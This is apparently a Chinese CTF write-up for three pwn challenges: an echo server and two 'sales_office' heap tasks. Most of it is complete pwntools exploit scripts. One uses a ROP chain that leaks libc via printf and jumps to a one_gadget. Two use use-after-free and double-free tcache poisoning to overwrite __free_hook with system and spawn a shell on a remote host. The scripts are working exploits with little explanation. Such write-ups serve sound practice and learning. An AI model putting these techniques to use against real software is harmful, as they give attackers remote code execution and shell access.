三道PWN,感觉还好。

echo server

挺基础的泄露+利用,我用的one_gedget来梭哈的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug,flaag):
	elf = ELF(flaag)
	global p
	if(debug == 1):
		p = process(flaag)

	else:
		p = remote(ip,port)
	#gdb.attach(p)
	p.sendlineafter("is your name: ","256")
	pop_rdi_ret=0x400823
	pop_rsi_ret=0x400821
	payload="A"*128+p64(0x7fffffffff)+p64(pop_rdi_ret)+p64(0x400875)
	payload+=p64(pop_rsi_ret)+p64(elf.got["__libc_start_main"])+p64(0)
	payload+=p64(elf.plt["printf"])+p64(0x4007a5)
	p.sendlineafter("s you name? ",payload)
	p.recvuntil("hello ")
	p.recvuntil("hello ")
	libc_addr=u64(p.recv(6).ljust(8,"\x00"))
	print "libc_addr=",hex(libc_addr)
	#libc_addr=u64(p.recvuntil("how long",True)[-6:].ljust(8,"\x00"))
	libc=ELF("libc.so.6")
	libcbase_addr=libc_addr-libc.symbols["__libc_start_main"]
	system_addr=libcbase_addr+libc.symbols["system"]
	binsh_addr=libcbase_addr+libc.search("/bin/sh\x00").next()
	one_ge=[0x4f2c5,0x4f322,0x10a38c]
	p.sendlineafter("is your name: ","256")
	payload="A"*136+p64(libcbase_addr+one_ge[0])#p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
	p.sendlineafter("s you name? ",payload)
	p.interactive()
if __name__ == '__main__':
	pwn('183.129.189.60',10025,0,'./test')

sales_office

UAF漏洞,远程还是2.27,可以秒。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('sales_office')
p = 0
def pwn(ip,port,debug):
	global p
	if(debug == 1):
		p = process('./sales_office')

	else:
		p = remote(ip,port)
	def add(strlen,content):
		p.sendlineafter("choice:","1")
		p.sendlineafter("size of your house:\n",str(strlen))
		p.sendlineafter("decorate your house:\n",content)
	def show(index):	
		p.sendlineafter("choice:","3")
		p.sendlineafter("index:",str(index))
	def free(index):
		p.sendlineafter("choice:","4")
		p.sendlineafter("index:",str(index))
	add(0x10,"/bin/sh")
	p.sendlineafter("choice:","1")
	p.sendlineafter("size of your house:\n","200")
	free(0)
	free(0)
	free(1)
	add(0x10,p64(0x602080))
	p.sendlineafter("choice:","1")
	p.sendlineafter("size of your house:\n","200")
	p.sendlineafter("choice:","1")
	p.sendlineafter("size of your house:\n","200")
	show(2)
	p.recvuntil("house:\n")
	libc_addr=u64(p.recv(6).ljust(8,"\x00"))
	free_hook=libc_addr+0x1188
	system_addr=free_hook-0x39e4a8
	free(1)
	free(1)
	p.sendlineafter("choice:","1")
	p.sendlineafter("size of your house:\n","200")
	free(1)
	print "libc_addr=",hex(libc_addr)
	add(0x10,p64(free_hook))
	add(0x10,p64(system_addr))
	add(0x10,"/bin/sh")
	free(4)
	#gdb.attach(p)
	p.interactive()
if __name__ == '__main__':
	pwn('183.129.189.60',10024,0)

sales_office_2

跟第二题一模一样,不过远程是2.29,double free可能有点麻烦,经师傅提示用house of spirit来伪造chunk,不过我还是用的double free.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('sales_office')
p = 0
def pwn(ip,port,debug):
	global p
	if(debug == 1):
		p = process('./sales_office')

	else:
		p = remote(ip,port)
	def add(strlen,content):
		p.sendlineafter("choice:","1")
		p.sendlineafter("size of your house:\n",str(strlen))
		p.sendlineafter("decorate your house:\n",content)
	def NULLadd():
		p.sendlineafter("choice:","1")
		p.sendlineafter("size of your house:\n","300")
	def show(index):	
		p.sendlineafter("choice:","3")
		p.sendlineafter("index:",str(index))
	def free(index):
		p.sendlineafter("choice:","4")
		p.sendlineafter("index:",str(index))
	for i in range(5):
		add(0x20,"/bin/sh")
	add(0x20,"/bin/sh") #----5
	NULLadd()
	free(5)
	free(6)
	add(0x10,p64(0x602080))
	show(5)
	p.recvuntil("house:\n")
	libc_addr=u64(p.recv(6).ljust(8,"\x00"))
	free_hook=libc_addr+0x1e48
	system_addr=free_hook-0x1945d8

	add(0x20,"/bin/sh")#-----7
	add(0x20,"/bin/sh")
	NULLadd()
	free(6)
	free(4)
	free(3)
	free(2)
	free(1)
	free(0)

	free(7)
	free(8)
	free(7)
	free(9)
	for i in range(7):
		NULLadd()
	NULLadd()
	add(0x10,p64(free_hook))
	print "libc_addr=",hex(libc_addr)
	print "free_hook=",hex(free_hook)
	NULLadd()
	add(0x10,p64(system_addr))
	add(0x10,"/bin/sh")
	free(11)
	p.interactive()
if __name__ == '__main__':
	pwn('183.129.189.60',10025,1)

总结

以后学会了有UAF,并且chunk内有指针优先用house of spirit,简直通杀我靠。自己也是用double free习惯了。西八。